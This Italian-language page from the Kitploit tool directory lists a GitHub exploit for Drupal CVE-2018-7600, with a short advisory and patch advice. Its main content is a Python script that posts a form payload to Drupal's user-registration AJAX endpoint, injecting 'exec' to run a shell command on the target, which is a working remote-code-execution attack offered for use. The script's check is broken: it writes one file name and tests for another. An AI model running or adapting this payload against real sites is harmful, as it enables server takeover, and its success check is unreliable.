Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-7600. — CVE-2018-7600 | Kitploit
Strumenti/GitHubGitHub/tpdlshdmlrkfmcla/cve-2018-7600.
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubtpdlshdmlrkfmcla/cve-2018-7600.

CVE-2018-7600.

CVE-2018-7600

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

IGLOO Corp, Won Chi Hyun Rapporto di analisi della RCE di Drupal

RCE di Drupal CVE-2018-7600

Non dimenticare di inserire il tuo indirizzo nello script! Descrizione: Esiste una vulnerabilità di esecuzione remota del codice in diversi sottosistemi di Drupal 7.x e 8.x. Ciò consente potenzialmente agli attaccanti di sfruttare molteplici vettori di attacco su un sito Drupal, che potrebbe portare al completo compromesso del sito.

Soluzione: Aggiorna alla versione più recente del core di Drupal 7 o 8.

Se stai utilizzando 7.x, aggiorna a Drupal 7.58. (Se non puoi aggiornare immediatamente, puoi provare ad applicare questa patch per correggere la vulnerabilità finché non sei in grado di completare l'aggiornamento.) Se stai utilizzando 8.5.x, aggiorna a Drupal 8.5.1. (Se non puoi aggiornare immediatamente, puoi provare ad applicare questa patch per correggere la vulnerabilità finché non sei in grado di completare l'aggiornamento.)

root@kitploit:~
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL                                            |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > [email protected]                                   | |
|GITHUB > https://github.com/r3dxpl0it                                | |
|WEB-PAGE > https://r3dxpl0it.Github.io                               |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests

def exploit(target):
    pass
    proxies = {}
    verify = False

    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
    url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    print ( '[*]' + ' requesting post')
    r = requests.post(url, proxies=proxies, data=payload, verify=verify)
    try:
        scan = requests.get(target + 'vulnerable.txt')
        if scan.status_code != 200:
           print ( ' not vulnerable to cve-2018-7600 exploit \n')
        if scan.status_code == 200:
           print (' vulnerable to cve-2018-7600 exploit')
           print (' url: ' + target + 'vulnerable.txt \n')
    except requests.ConnectionError:
        print (' target connection timeout')
    except Exception as e :
        print ('Connction Failed ' + e )
				

if __name__ == '__main__':
   exploit(sys.argv[1])
Scarica lo strumento

Analisi del codice.

main -> exploit

argv[1] - argomento target scan. status_code restituisce il risultato in base al valore del codice di stato Gestione delle eccezioni degli eventi